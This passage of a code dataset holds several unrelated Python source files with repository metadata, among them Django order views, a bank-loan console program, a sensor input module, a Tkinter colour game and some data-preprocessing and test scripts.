订购数量\n if remaining >= quantity:\n order = form.save()\n # 忽略输入界面中的总价, 使用 单价 * 数量 进行计算\n order.total_price = order.price * order.quantity\n order.save() # 保存计算后总价\n # 修改库存商品的已购数量\n stock.unit_on_order += order.quantity\n stock.save() # 保存修改后库存信息\n return redirect(index)\n\n error_msg = f'库存数量不足, 还剩 {remaining} {stock.quantity_unit}'\n return render(request, 'order/edit.html', locals())\n\n error_msg = '添加数据出错,请检查输入的数据格式'\n return render(request, 'order/edit.html', locals())\n\n form = EditForm()\n return render(request, 'order/edit.html', locals())\n\n\ndef update(request, id):\n data = get_object_or_404(Order, pk=id)\n if request.method == 'POST':\n form = EditForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n # 查找修改前的订单\n old_order = get_object_or_404(Order, pk=id)\n stock = cd['stock']\n data.stock = stock\n data.customer = cd['customer']\n data.quantity = cd['quantity']\n data.quantity_unit = cd['quantity_unit']\n data.price = cd['price']\n data.total_price = cd['total_price']\n data.time_on_order = cd['time_on_order']\n # 如果修改了订单中商品数量, 同时修改 库存中的已售数量\n stock.unit_on_order += (data.quantity - old_order.quantity)\n # 当修改商品订单数量时, 有足够的剩余才保存, 否则不保存(保存就是实现修改)\n if stock.unit_in_stock - stock.unit_on_order >= 0:\n data.save()\n stock.save() # 保存\n return redirect(index)\n\n error_msg = '商品库存数量不足'\n return render(request, 'order/edit.html', locals())\n\n error_msg = '修改数据出错,请检查输入的数据格式'\n return render(request, 'order/edit.html', locals())\n\n form = EditForm(initial={\n 'stock': data.stock,\n 'customer': data.customer,\n 'quantity': data.quantity,\n 'quantity_unit': data.quantity_unit,\n 'price': data.price,\n 'total_price': data.total_price,\n 'time_on_order': data.time_on_order,\n })\n return render(request, 'order/edit.html', locals())\n\n\ndef delete(request, id):\n data = get_object_or_404(Order, pk=id)\n if request.method == 'POST':\n data.delete()\n return redirect(index)\n\n return render(request, 'order/delete.html', locals())\n\n\ndef detail(request, id):\n data = get_object_or_404(Order, pk=id)\n return render(request, 'order/detail.html', locals())\n\n\ndef report(request):\n # .values(\"customer__name\") 第一个 .values(), 进行分组的字段, 相同的会合并进行汇总\n data_customer = Order.objects.values(\"customer__name\").annotate(\n # .annotate() 
汇总的项目\n month=ExtractMonth('time_on_order'), # ExtractMonth 用于按月获取数据\n total=Sum(\"total_price\")).values(\n # 最后的 .values(), 分类汇总结果输出的字段\n \"customer__name\", \"total\", \"month\")\n # 使用 HttpResponse 在浏览器检查汇总的结果\n # return HttpResponse(data)\n if data_customer:\n # Bar为柱状图\n bar = Bar(init_opts=opts.InitOpts(width='800px', height='400px'))\n # x轴显示信息\n bar.add_xaxis([f\"{i['month']}月 - {i['customer__name']}\" for i in data_customer])\n # 添加一个Y轴信息\n bar.add_yaxis('消费总金额: ', [i['total'] for i in data_customer])\n # 生成图表时html文件的路径从 templates 开始,\n # 提前建好渲染的空 html 文件, 否则第一次启动并且没有数据时会出现异常\n bar.render('templates/render/bar_customer.html')\n\n data_products = Order.objects.values(\"stock__product__name\").annotate(\n # .annotate() 汇总的项目\n month=ExtractMonth('time_on_order'),\n total=Sum(\"total_price\")).values(\n \"stock__product__name\", \"total\", \"month\")\n # return HttpResponse(data_products)\n\n if data_products:\n # Pie 用于生成饼图\n pie_product = Pie(init_opts=opts.InitOpts(width='400px', height='250px'))\n # 饼图的颜色列表\n pie_product.set_colors([\"blue\", \"green\", \"yellow\", \"red\", \"pink\", \"orange\", \"purple\"])\n # 设置标题\n pie_product.set_global_opts(\n title_opts=opts.TitleOpts(title=\"每月商品销售额比例\"),\n # 设置图例位置\n legend_opts=opts.LegendOpts(type_=\"scroll\", pos_left=\"70%\", orient=\"vertical\"), )\n # 添加饼图数据\n pie_product.add(\n \"\",\n [list(z) for z in zip(\n [f\"{i['month']}月 - {i['stock__product__name']}\" for i in data_products], # 文字\n [i['total'] for i in data_products])], # 数值\n radius=[\"30%\", \"75%\"], # 可选项\n center=[\"35%\", \"50%\"], # 可选项\n rosetype=\"radius\", # 可选项\n )\n # 生成到第二个文件, 生成图表时html文件的路径从 templates 开始, 提前建好渲染的空 html 文件\n pie_product.render('templates/render/pie_product.html')\n\n data_supplier = Order.objects.values(\"stock__supplier__name\").annotate(\n # .annotate() 汇总的项目\n # month=ExtractMonth('time_on_order'),\n total=Sum(\"total_price\")).values(\n \"stock__supplier__name\", \"total\", )\n # return HttpResponse(data_supplier)\n\n if data_supplier:\n pie_supplier = Pie(init_opts=opts.InitOpts(width='400px', height='250px'))\n pie_supplier.set_colors([\"blue\", \"green\", \"yellow\", \"red\", \"pink\", \"orange\", \"purple\"])\n # 设置标题\n pie_supplier.set_global_opts(\n title_opts=opts.TitleOpts(title=\"每月按供应商销售金额比例\"),\n # 设置图例位置\n legend_opts=opts.LegendOpts(type_=\"scroll\", pos_left=\"70%\", orient=\"vertical\"), )\n # # pie_product.set_series_opts()\n pie_supplier.add(\n \"\",\n [list(z) for z in zip(\n [i['stock__supplier__name'] for i in data_supplier],\n [i['total'] for i in data_supplier])],\n radius=[\"30%\", \"75%\"],\n center=[\"35%\", \"50%\"],\n rosetype=\"radius\",\n )\n # 生成到第三个文件, 生成图表时html文件的路径从 templates 开始, 提前建好渲染的空 html 文件\n pie_supplier.render('templates/render/pie_supplier.html')\n\n # 在 'order/report.html' 引用 以上生成的三个文件\n return render(request, 'order/report.html', locals())\n","repo_name":"hujiyi/mystore","sub_path":"order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34970821973","text":"import math, random\nimport logging, os, sys\nimport numpy as np\nfrom src.models.arena import Arena\nfrom src.models.agent import Agent\nfrom PyQt5.QtCore import *\n\n\nclass Fish(Agent):\n \"\"\"\n Fish class.\n Inherits tick() and move() from agent class.\n Additionally handles checking if it follows the robot.\n\n\n Args:\n Agent (Agent): Parent base class\n \"\"\"\n\n def __init__(\n self,\n id,\n pos,\n ori,\n arena,\n config,\n dir=None,\n zoa=None,\n zoo=None,\n zor=None,\n time_step=None,\n ):\n super().__init__(id, pos, ori, arena, config, dir, zor, zoo, zoa, time_step)\n\n # self.aligned_with_robot = False\n self.follow_angle = self.config[\"DEFAULTS\"][\"follow_angle\"]\n self.follow_angle_cos = np.cos(np.radians(self.follow_angle))\n self.following = False\n self.cos_max_turn_per_time_step = np.cos(\n np.radians(self.max_turn_rate * self.time_step * 10)\n )\n\n def check_following(self, robot_pos, robot_dir):\n \"\"\"Check if fish follows robot\n\n Args:\n robot_pos (list): Current robot position\n robot_dir (list): Current robot direction\n \"\"\"\n try:\n # robot in attaction zone\n if self.influenced_by_robot:\n # check if robot swims in same direction as fish\n # orientation difference can't be larger than max turning rate * 10 (roughly same direction)\n # calculate angle between both directions\n inner = np.inner(self.dir, robot_dir)\n norms = np.linalg.norm(self.dir) * np.linalg.norm(robot_dir)\n ori_diff = inner / norms\n roughly_same_dir = ori_diff >= self.cos_max_turn_per_time_step\n\n # robot must be in front of fish\n # cos of angle between (robot_pos-self.pos) vector and self.dir cannot be smaller than 0 (angle can't be larger than pi/2 -> 90degrees) / smaller than 60 -> cos(radians(80)) = 0.17365152758\n between_v = robot_pos - self.pos\n inner = np.inner(between_v, self.dir)\n norms = np.linalg.norm(between_v) * np.linalg.norm(self.dir)\n ori_diff2 = inner / norms\n in_front = ori_diff2 > self.follow_angle_cos\n\n if roughly_same_dir and in_front:\n self.following = True\n return\n self.following = False\n except Exception:\n logging.error(\"FISH: Error while following check\")\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.error(exc_type, fname, exc_tb.tb_lineno)\n","repo_name":"jotpio/behavior_HF","sub_path":"src/models/fish.py","file_name":"fish.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30293022264","text":"import json\nfrom time import sleep\nimport os\nfrom getpass import getpass\n\ndef dec1(str):\n print(\"*\"*120)\n print((\"--\"+str+\"--\").center(120))\n print(\"*\"*120)\n print(\"\\n\")\n\n\ndef clear(str):\n os.system(\"cls\")\n dec1(str)\n\n\ndef get_data():\n fp=open(\"G://Workspace/Python/Bank/data.db\",\"r+\")\n data=json.load(fp)\n fp.close()\n return data\n\ndef leap(a):\n if a%4==0 and a%100==0:\n if a%400==0:\n return 1\n else:\n return 0\n elif a%4==0:\n return 1\n else:\n return 0\n\ndef put_data(data):\n fp=open(\"G://Workspace/Python/Bank/data.db\",\"w\")\n json.dump(data,fp)\n fp.close()\n\ndef load():\n \n print(\"Loading\",end='')\n \n for var in range(6):\n sleep(0.4)\n print('.',end='')\n\ndef loan():\n clear(\"Loan \")\n acn=input(\"Enter Your Account Number:-\")\n data=get_data()\n if acn not in (data.keys()-['mgr','key']):\n clear(\"Loan\")\n print(\"acount number not available please try again\".center(120,\"*\"))\n load()\n loan()\n i=0\n while i==0:\n usr_nm=input(\"Enter user name:-\")\n paswd=getpass(\"Enter password:-\")\n data=get_data()\n if usr_nm!=data[acn]['user'] or paswd!=data[acn]['password']:\n clear(\"Withdrawal\")\n print(\"Transaction Failed\".center(120,\"*\"))\n print(\"username or password incorrect please try again\".center(120,\"*\"))\n else:\n i=1\n clear(\"Loan\")\n print(\"-.-.-.-.-.-.-.-.-Select your Profession-.-.-.-.-.-.-.-.-\")\n ch=int(input(\"1.Govt. employee\\n2.Private Employee\\n3.Businessman\\n4.Student\\n5.Unemployeed\\n\"))\n if ch==1:\n load()\n govt(acn)\n if ch==2:\n load()\n pvt_emp(acn)\n if ch==3:\n load()\n business(acn)\n if ch==4 or ch==5:\n load()\n clear(\"Loan\")\n print(\"You are Not Eligible for loan\")\n else:\n clear()\n print(\"invalid option Try Again\".center(120,\"*\"))\n loan()\n op=input(\"DO you want to continue \").strip().lower()\n if op=='yes':\n start()\n else:\n exit()\n\n\n\ndef govt(acn):\n clear(\"Loan\")\n data=get_data()\n if data[acn]['loan']!=0:\n load()\n clear(\"Loan\")\n print(\"Loan is already granted:- \".center(120,\"*\"))\n start()\n clear(\"loan\")\n salary=int(input(\"what is your monthly salary:- \"))\n pay_slip=''\n while pay_slip!='yes' and pay_slip!='no':\n pay_slip=input(\"Do yo have pay slip(Yes/no):- \").strip().lower()\n if pay_slip!='yes' and pay_slip!='no':\n print(\" please answer in Yes/No \")\n load()\n clear(\"Loan\")\n if pay_slip==\"no\":\n clear(\"Loan\")\n print(\" You are not eligible for a loan without pay slip \")\n load()\n load()\n start()\n if salary<20000:\n clear(\"Loan\")\n print(\" You are not eligible for a loan \")\n elif salary>=20000 and salary<50000:\n print(\"A loan of 100000 is Approved\")\n data[acn]['loan']=100000\n data[acn]['bal']+=100000\n elif salary>=50000 and salary<100000:\n print(\"A loan of 300000 is Approved\")\n data[acn]['loan']=200000\n data[acn]['bal']+=200000\n elif salary>=100000 and salary<500000:\n print(\"A loan of 400000 is Approved\")\n data[acn]['loan']=400000\n data[acn]['bal']+=400000\n elif salary>=500000:\n print(\"A loan of 1000000 is Approved\")\n data[acn]['loan']=1000000\n data[acn]['bal']+=1000000\n put_data(data)\n op=input(\"DO you want to continue \").strip().lower()\n if op=='yes':\n start()\n else:\n exit()\n\n\ndef pvt_emp(acn):\n clear(\"Loan\")\n data=get_data()\n if data[acn]['loan']!=0:\n load()\n clear(\"Loan\")\n print(\"A Loan is already Approved to you:- \")\n start()\n salary=int(input(\"what is your monthly salary:- \"))\n prop=''\n while prop!='yes' and prop!='no':\n 
clear(\"Loan\")\n prop=input(\"Loan can be granted againest property\\nAre you agree (Yes/no):- \").strip().lower()\n if prop!='yes' and prop!='no':\n print(\" please answer in Yes/No \")\n if prop==\"no\":\n clear(\"Loan\")\n print(\" Loan can not be Approved without property papers \")\n load()\n load()\n start()\n load()\n clear(\"Loan\")\n if salary<50000:\n print(\"You are not Eligible for loan\")\n elif salary>=50000 and salary<100000:\n print(\"A loan of 200000 is Approved\")\n data[acn]['loan']=200000\n data[acn]['bal']+=200000\n elif salary>=100000 and salary<300000:\n print(\"A loan of 300000 is Approved\")\n data[acn]['loan']=300000\n data[acn]['bal']+=300000\n elif salary>=300000:\n print(\"A loan of 500000 is Approved\")\n data[acn]['loan']=500000\n data[acn]['bal']+=500000\n put_data(data)\n op=input(\"DO you want to continue \").strip().lower()\n if op=='yes':\n start()\n else:\n exit()\n\n\ndef business(acn):\n clear(\"Loan\")\n data=get_data()\n if data[acn]['loan']!=0:\n load()\n clear(\"Loan\")\n print(\"Loan is already Approved to you:- \")\n load()\n load()\n start()\n salary=int(input(\"what is your monthly salary:- \"))\n ITR=''\n while ITR!='yes' and ITR!='no':\n ITR=input(\"Do you have GST number (Yes/no):- \").strip().lower()\n if ITR!='yes' and ITR!='no':\n print(\" please answer in Yes/No \")\n if ITR==\"no\":\n load()\n clear(\"Loan\")\n print(\"Loan can not be Approved without GST Number\")\n else:\n clear(\"Loan\")\n if salary<50000:\n print(\"You are not Eligible for Loan\")\n elif salary>=50000 and salary<100000:\n print(\"A loan of 50000 is Approved\")\n data[acn]['loan']=50000\n data[acn]['bal']+=50000\n elif salary>=100000 and salary<300000:\n print(\"A loan of 120000 is Approved\")\n data[acn]['loan']=120000\n data[acn]['bal']+=120000\n elif salary>=300000:\n print(\"A loan of 500000 is Approved\")\n data[acn]['loan']=500000\n data[acn]['bal']+=500000\n put_data(data)\n op=input(\"DO you want to continue \").strip().lower()\n if op=='yes':\n start()\n else:\n exit()\n\ndef start():\n loan()\nstart()","repo_name":"Peeyush-B/Python","sub_path":"Bank/Loan().py","file_name":"Loan().py","file_ext":"py","file_size_in_byte":6354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4641717640","text":"import encryptTransposition\nimport decryptTransposition\nimport sys\nimport random\n\ndef main():\n random.seed(42)\n for i in range(20):\n message='QWERTYUIOPASDFGHJKLZXCVBNM'*random.randint(4,40)\n message=list(message)\n random.shuffle(message)\n message=''.join(message)\n print('Test #%s: \"%s...\" '%(i+1, message))\n for key in range(1,int(len(message)/2)):\n encrypted=encryptTransposition.encryptMessage(key,message)\n decrypted=decryptTransposition.decryptMessage(key,message)\n if message !=decrypted:\n print('Mismatch with key %s and message %s '%(key, message))\n print('Decrypted as '+decrypted)\n sys.exit\n print('Transposition cipher test passed')\n\n\nmain()\n","repo_name":"kangliewbei128/sturdy-siamese","sub_path":"transpositionTest.py","file_name":"transpositionTest.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4479306139","text":"# # first class functions just mean that functions are variables\n# def divide(dividend, divisor):\n# if divisor == 0:\n# raise ZeroDivisionError(\"Divisor cannot be 0.\")\n#\n# return dividend / divisor\n#\n#\n# def calculate(*values, operator):\n# return operator(*values)\n#\n#\n# # divide here is a first class function because it's being passed in to calculate\n# result = calculate(20, 4, operator=divide)\n# print(result)\n\nfrom operator import itemgetter\n\n\ndef search(sequence, expected, finder):\n for elem in sequence:\n if finder(elem) == expected:\n return elem\n raise RuntimeError(f\"Could not find an element with {expected}\")\n\n\nfriends = [\n {\"name\": \"Rolf Smith\", \"age\": 24},\n {\"name\": \"Adam Wool\", \"age\": 30},\n {\"name\": \"Anne Pun\", \"age\": 27}\n]\n\n\ndef get_friend_name(friend):\n return friend[\"name\"]\n\n\n# print(search(friends, \"Bob Smith\", get_friend_name))\n# print(search(friends, \"Bob Smith\", lambda friend: friend[\"name\"]))\nprint(search(friends, \"Bob Smith\", itemgetter(\"name\")))","repo_name":"Bjcurty/PycharmProjects","sub_path":"Python-Refresher/33_first_class_functions/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20017020517","text":"import sys\nimport csv\nimport frontmatter\n\ndef dictinsert(key, source, d, input):\n if source in input:\n if input[source] != False:\n d[key] = input[source]\n else:\n d[key] = ''\n else:\n d[key] = ''\n\ndef strip(x):\n return x.strip()\n \nif len(sys.argv) < 2:\n print(\"Usage: \")\n sys.exit(-1)\n \nfname = sys.argv[1]\nsyllabus = frontmatter.load(fname)\ncsvfile = open(fname + '.csv', 'w')\nfieldnames = [\"Week\", \"Day\", \"Title\", \"Link\", \"dtitle1\", \"dlink1\", \"dpoints1\", \"drubric1\", \"dtype1\", \"dtitle2\", \"dlink2\", \"dpoints2\", \"drubric2\", \"dtype2\", \"dtitle3\", \"dlink3\", \"dpoints3\", \"drubric3\", \"dtype3\", \"rtitle1\", \"rlink1\", \"rtitle2\", \"rlink2\", \"rtitle3\", \"rlink3\", \"rtitle4\", \"rlink4\", \"rtitle5\", \"rlink5\"]\ncsvwriter = csv.DictWriter(csvfile, fieldnames=fieldnames)\ncsvwriter.writeheader()\n\nfor day in syllabus['schedule']:\n row = dict()\n \n dictinsert('Week', 'week', row, day)\n dictinsert('Day', 'date', row, day)\n dictinsert('Title', 'title', row, day)\n dictinsert('Link', 'link', row, day)\n \n if 'deliverables' in day:\n dcount = 1\n for deliverable in day['deliverables']:\n dictinsert('dtitle' + str(dcount), 'dtitle', row, deliverable)\n dictinsert('dlink' + str(dcount), 'dlink', row, deliverable)\n dictinsert('dpoints' + str(dcount), 'points', row, deliverable)\n dictinsert('dtype' + str(dcount), 'submission_types', row, deliverable)\n dictinsert('drubric' + str(dcount), 'rubricpath', row, deliverable)\n \n dcount += 1\n \n if dcount > 3:\n break\n else:\n for i in range(3):\n row['dtitle' + str(i+1)] = ''\n row['dlink' + str(i+1)] = ''\n row['dpoints' + str(i+1)] = ''\n row['drubric' + str(i+1)] = ''\n row['dtype' + str(i+1)] = ''\n \n if 'readings' in day:\n rcount = 1\n for reading in day['readings']:\n dictinsert('rtitle' + str(rcount), 'rtitle', row, reading)\n dictinsert('rlink' + str(rcount), 'rlink', row, reading)\n \n rcount += 1\n \n if rcount > 5:\n break\n else:\n for i in range(5):\n row['rtitle' + str(i+1)] = ''\n row['rlink' + str(i+1)] = ''\n \n csvwriter.writerow(row)\n \ncsvfile.close()\n","repo_name":"BillJr99/Ursinus-Boilerplate-Code","sub_path":"course/syllabus_markdown_table_generator/markdown-to-csv.py","file_name":"markdown-to-csv.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71766653955","text":"# coding=utf-8\nimport copy\nfrom flask_babel import lazy_gettext\n\nfrom mycodo.inputs.base_input import AbstractInput\nfrom mycodo.inputs.sensorutils import calculate_dewpoint\nfrom mycodo.inputs.sensorutils import calculate_vapor_pressure_deficit\n\n# Measurements\nmeasurements_dict = {\n 0: {\n 'measurement': 'temperature',\n 'unit': 'C'\n },\n 1: {\n 'measurement': 'humidity',\n 'unit': 'percent'\n },\n 2: {\n 'measurement': 'dewpoint',\n 'unit': 'C'\n },\n 3: {\n 'measurement': 'vapor_pressure_deficit',\n 'unit': 'Pa'\n }\n}\n\n# Input information\nINPUT_INFORMATION = {\n 'input_name_unique': 'HTU21D_CIRCUITPYTHON',\n 'input_manufacturer': 'TE Connectivity',\n 'input_name': 'HTU21D',\n 'input_library': 'Adafruit_CircuitPython_HTU21D',\n 'measurements_name': 'Humidity/Temperature',\n 'measurements_dict': measurements_dict,\n 'url_manufacturer': 'https://www.te.com/usa-en/product-CAT-HSC0004.html',\n 'url_datasheet': 'https://www.te.com/commerce/DocumentDelivery/DDEController?Action=showdoc&DocId=Data+Sheet%7FHPC199_6%7FA6%7Fpdf%7FEnglish%7FENG_DS_HPC199_6_A6.pdf%7FCAT-HSC0004',\n 'url_product_purchase': 'https://www.adafruit.com/product/1899',\n\n 'options_enabled': [\n 'i2c_location',\n 'measurements_select',\n 'period',\n 'pre_output'\n ],\n 'options_disabled': ['interface'],\n\n 'dependencies_module': [\n (\"pip-pypi\", \"adafruit_extended_bus\", \"Adafruit-extended-bus==1.0.2\"),\n (\"pip-pypi\", \"adafruit_htu21d\", \"adafruit-circuitpython-HTU21D==0.11.0\"),\n ],\n\n 'interfaces': ['I2C'],\n 'i2c_location': ['0x40'],\n 'i2c_address_editable': False,\n\n 'custom_options': [\n {\n 'id': 'temperature_offset',\n 'type': 'float',\n 'default_value': 0.0,\n 'required': True,\n 'name': lazy_gettext(\"Temperature Offset\"),\n 'phrase': \"The temperature offset (degrees Celsius) to apply\"\n }\n ]\n}\n\n\nclass InputModule(AbstractInput):\n \"\"\"\n A sensor support class that measures the HTU21D's humidity and temperature\n and calculates the dew point\n \"\"\"\n def __init__(self, input_dev, testing=False):\n super().__init__(input_dev, testing=testing, name=__name__)\n\n self.sensor = None\n self.i2c_address = 0x40 # HTU21D-F Address\n\n self.temperature_offset = None\n\n if not testing:\n self.setup_custom_options(\n INPUT_INFORMATION['custom_options'], input_dev)\n self.try_initialize()\n\n def initialize(self):\n import adafruit_htu21d\n from adafruit_extended_bus import ExtendedI2C\n\n self.sensor = adafruit_htu21d.HTU21D(\n ExtendedI2C(self.input_dev.i2c_bus),\n address=self.i2c_address,\n )\n\n def get_measurement(self):\n \"\"\"Gets the humidity and temperature\"\"\"\n if not self.sensor:\n self.logger.error(\"Error 101: Device not set up. 
See https://kizniche.github.io/Mycodo/Error-Codes#error-101 for more info.\")\n return None\n\n self.return_dict = copy.deepcopy(measurements_dict)\n\n if self.is_enabled(0):\n self.value_set(0, self.sensor.temperature + self.temperature_offset)\n\n if self.is_enabled(1):\n self.value_set(1, self.sensor.relative_humidity)\n\n if self.is_enabled(2) and self.is_enabled(0) and self.is_enabled(1):\n self.value_set(2, calculate_dewpoint(self.value_get(0), self.value_get(1)))\n\n if self.is_enabled(3) and self.is_enabled(0) and self.is_enabled(1):\n self.value_set(3, calculate_vapor_pressure_deficit(self.value_get(0), self.value_get(1)))\n\n return self.return_dict\n","repo_name":"kizniche/Mycodo","sub_path":"mycodo/inputs/htu21d_circuitpython.py","file_name":"htu21d_circuitpython.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":2708,"dataset":"github-code","pt":"61"}
+{"seq_id":"8417347779","text":"import Tkinter\r\nimport random\r\nbg = ['Red','Aqua','Blue','cyan','teal','Green','Pink','Black','Yellow','Orange','White','Purple','Brown']\r\nscore=0\r\ntimeleft=10\r\n\r\ndef startGame(event):\r\n\r\n \r\n if timeleft == 10:\r\n \r\n countdown()\r\n \r\n nextColour()\r\ndef nextColour():\r\n global score\r\n global timeleft\r\n timeleft =10\r\n if timeleft > 0:\r\n e.focus_set()\r\n if e.get().lower() == bg[1].lower():\r\n score += 1\r\n timeLabel.config(text=\"Time left: \" + str(timeleft))\r\n e.delete(0, Tkinter.END)\r\n random.shuffle(bg)\r\n label.config(fg=str(bg[1]), text=str(bg[0]))\r\n \r\n scoreLabel.config(text=\"Score: \" + str(score)) \r\ndef countdown():\r\n\r\n \r\n global timeleft\r\n if timeleft > 0: \r\n timeleft -= 1\r\n timeLabel.config(text=\"Time left: \" + str(timeleft))\r\n timeLabel.after(1000, countdown)\r\n else:\r\n timeLabel.config(text=\"Time UP!!!!\")\r\n e.config(state='disabled')\r\nroot = Tkinter.Tk()\r\nroot.title(\"Color Game\")\r\nroot.geometry(\"400x250\")\r\ninstructions = Tkinter.Label(root, text=\"Type Colour Name,Not Word Text!\", font=('Bold', 12))\r\ninstructions.pack()\r\nscoreLabel = Tkinter.Label(root, text=\"Press enter to start\", font=('Bold', 12))\r\nscoreLabel.pack()\r\ntimeLabel = Tkinter.Label(root, text=\"Time left: \" + str(timeleft), font=('Bold', 12))\r\ntimeLabel.pack()\r\nlabel = Tkinter.Label(root, font=('Bold', 70))\r\nlabel.pack()\r\n\r\ne = Tkinter.Entry(root)\r\nroot.bind('', startGame)\r\ne.pack()\r\ne.focus_set()\r\nroot.mainloop()\r\n","repo_name":"gaurav112007/Color-game","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37241720038","text":"import csv\nimport json\n\ndef process_data(cur_split):\n # load raw text\n with open(f\"./data/raw/QuALITY.v1.0.1.htmlstripped.{cur_split}\", \"r\") as f:\n data = f.readlines()\n data = [json.loads(x) for x in data]\n\n # extract questions\n ret = []\n cnter = 0\n for item in data:\n article_id = item['article_id']\n for q in item['questions']:\n question = q['question']\n options = q['options']\n gold_label = q['gold_label']\n assert len(options) == 4\n q_item = {\n 'qid': cnter,\n 'article_id' : article_id,\n 'question' : question,\n 'option_1' : options[0],\n 'option_2' : options[1],\n 'option_3' : options[2],\n 'option_4' : options[3],\n 'gold_label' : gold_label,\n }\n ret.append(q_item)\n cnter += 1\n\n with open(f\"./data/processed/quality_{cur_split}_q.csv\", \"w\") as f:\n writer = csv.DictWriter(f, fieldnames=['qid', 'article_id', 'question', 'option_1',\n 'option_2', 'option_3', 'option_4', 'gold_label'])\n writer.writeheader()\n writer.writerows(ret)\n\nif __name__ == \"__main__\":\n process_data(\"train\")\n process_data(\"dev\")","repo_name":"SimengSun/pearl","sub_path":"data_preproc.py","file_name":"data_preproc.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"61"}
+{"seq_id":"2033345629","text":"import unittest\nfrom unittest.mock import MagicMock, patch\nfrom app.test.base import BaseTestCase\nfrom app.main.util.event_processor import build_event_processor, StartEvent, SchemaValidationError\n\nclass TestEventProcessor(BaseTestCase):\n\n def test_start_event_deserialization(self):\n payload = {\n \"event_type\": \"start\",\n \"message_id\": \"061371f1-eda5-4fea-96ee-436a6dd4f8d7\",\n \"message_at\": \"2018-09-21T18:04:55+00:00\",\n \"event_at\": \"2018-09-21T18:03:55+00:00\",\n \"match_id\": \"ef4146ee-64e3-430b-b6af-b12671e4beef\",\n \"location\": \"toronto\",\n \"team_1\": \"Toronto\",\n \"team_2\": \"Montreal\"\n }\n event = StartEvent(payload)\n result = event.deserialize()\n self.assertEquals(result.errors, {})\n\n def test_start_event_deserialization_error(self):\n payload = {\n \"event_type\": \"start\",\n \"message_id\": \"061371f1-eda5-4fea-96ee-436a6dd4f8d7\",\n }\n event = StartEvent(payload)\n self.assertRaises(SchemaValidationError, event.deserialize)\n\n @patch('app.main.util.event_processor.Kafka')\n def test_publish_to_kafka(self, mock_kafka):\n payload = {\n \"event_type\": \"start\",\n \"message_id\": \"061371f1-eda5-4fea-96ee-436a6dd4f8d7\",\n \"message_at\": \"2018-09-21T18:04:55+00:00\",\n \"event_at\": \"2018-09-21T18:03:55+00:00\",\n \"match_id\": \"ef4146ee-64e3-430b-b6af-b12671e4beef\",\n \"location\": \"toronto\",\n \"team_1\": \"Toronto\",\n \"team_2\": \"Montreal\"\n }\n event = StartEvent(payload)\n event.process()\n mock_kafka.return_value.publish_event.assert_called()\n\nclass TestBuildEventProcessor(BaseTestCase):\n\n def test_start_event_creation(self):\n payload = {\n \"event_type\": \"start\",\n \"message_id\": \"061371f1-eda5-4fea-96ee-436a6dd4f8d7\",\n \"message_at\": \"2018-09-21T18:04:55+00:00\",\n \"event_at\": \"2018-09-21T18:03:55+00:00\",\n \"match_id\": \"ef4146ee-64e3-430b-b6af-b12671e4beef\",\n \"location\": \"toronto\",\n \"team_1\": \"Toronto\",\n \"team_2\": \"Montreal\"\n }\n event = build_event_processor(payload)\n self.assertTrue(isinstance(event, StartEvent))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"harneksidhu/programming_challenges","sub_path":"swift_medical/event_splitter/app/test/test_event_processor.py","file_name":"test_event_processor.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39575391944","text":"from __future__ import annotations\n\nimport attrs\nimport torch\nfrom typeguard import typechecked\n\nfrom zetta_utils import builder, convnet, tensor_ops\n\n\n@builder.register(\"SimpleInferenceRunner\")\n@attrs.mutable\n@typechecked\nclass SimpleInferenceRunner: # pragma: no cover\n # Don't create the model during initialization for efficient serialization\n model_path: str\n unsqueeze_to: int | None = None\n\n def __call__(self, src: torch.Tensor) -> torch.Tensor:\n if torch.cuda.is_available():\n device = \"cuda\"\n else:\n device = \"cpu\"\n\n # load model during the call _with caching_\n model = convnet.utils.load_model(self.model_path, device=device, use_cache=True)\n if self.unsqueeze_to is not None:\n src = tensor_ops.unsqueeze_to(src, self.unsqueeze_to)\n result = model(src.to(device))\n return result\n","repo_name":"ZettaAI/zetta_utils","sub_path":"zetta_utils/convnet/simple_inference_runner.py","file_name":"simple_inference_runner.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"}
